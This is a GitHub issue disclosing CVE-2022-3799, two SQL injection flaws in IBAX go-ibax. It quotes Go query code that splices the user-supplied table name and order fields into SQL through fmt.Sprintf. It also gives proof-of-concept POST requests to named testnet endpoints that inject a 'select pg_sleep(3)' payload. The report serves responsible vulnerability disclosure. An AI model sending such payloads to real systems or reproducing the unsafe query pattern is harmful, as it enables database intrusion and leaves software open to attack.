CVE-2022-3799: SQL Injection vulnerabilities · Issue #2060 · IBAX-io/go-ibax

Describe the bug

There are two SQL injection vulnerabilities

First place

file:

query := fmt.Sprintf("SELECT tablename from pg_tables where schemaname =’public’ and tablename like %s order by %s offset %d limit %d", "’%"+form.Table_name+"%’", form.Order, (form.Page-1)*form.Limit, form.Limit)

query := fmt.Sprintf("SELECT tablename from pg_tables where schemaname =’public’ and tablename like %s order by %s offset %d limit %d", "’%"+form.Table_name+"%’", form.Order, (form.Page-1)*form.Limit, form.Limit)

POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo

data: page=1&limit=1&order=1; select pg_sleep(3)–

Second place

file:

sqlQuery := fmt.Sprintf("SELECT column_name,data_type,column_default FROM information_schema.columns WHERE table_name=’%s’ ORDER BY %s", form.Table_name, order)

sqlQuery := fmt.Sprintf("SELECT column_name,data_type,column_default FROM information_schema.columns WHERE table_name=’%s’ ORDER BY %s", form.Table_name, order)

POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/columnsInfo

data: table_name=1; select pg_sleep(3)–

Reproduction

POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo

data: page=1&limit=1&order=1; select pg_sleep(3)–

as you can see, when I use pg_sleep, the request is delayed 3s.

System Info****Logs

No response

Validations

• Read the docs.
• Check that there isn’t already an issue that reports the same bug to avoid creating a duplicate.
• Check that this is a concrete bug. For Q&A open a GitHub Discussion or join our Discord Chat Server.
• The provided reproduction is a minimal reproducible example of the bug.